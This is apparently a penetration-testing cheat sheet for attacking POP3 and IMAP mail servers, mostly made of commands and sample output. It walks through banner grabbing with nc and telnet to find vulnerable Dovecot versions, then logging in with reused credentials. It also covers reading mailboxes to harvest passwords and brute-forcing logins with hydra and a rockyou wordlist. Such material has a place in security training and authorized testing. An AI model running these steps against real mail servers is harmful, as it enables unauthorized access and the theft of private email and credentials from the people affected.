POP3 (110/995) / IMAP (143/993)

Version info — Check for exploits

nc -nv $IP 110
nc -nv $IP 143
Example Output
telnet 10.10.10.5 110
+OK Dovecot POP3 ready <1234.abc@target>

telnet 10.10.10.5 143
* OK [CAPABILITY IMAP4rev1] Dovecot IMAP ready
(Check version: Dovecot 2.2.x has known auth bypass CVEs)

Login with found creds

Try creds from other services — Read emails for more creds

telnet $IP 110
USER <user>
PASS <pass>
Example Output
telnet 10.10.10.5 110
+OK POP3 server ready
USER admin
+OK
PASS admin123
+OK Logged in.
LIST
1 1024
2 2048
(2 emails to read)

List and read emails

After POP3 login — Emails often contain passwords

LIST
RETR 1
RETR 2
Example Output
RETR 1
From: sysadmin@corp.local
Subject: New server credentials

Hi, the new server password is: Summer2024!
Please change it ASAP.
(CREDENTIALS IN EMAIL)

Brute force

If you have a username — Weak mail passwords

hydra -l <user> -P passwords.txt $IP pop3
Example Output
hydra -l admin -P rockyou.txt 10.10.10.5 pop3
[110][pop3] login: admin password: welcome1

hydra -l admin -P rockyou.txt 10.10.10.5 imap
[143][imap] login: admin password: welcome1
(Now read their emails for creds/info)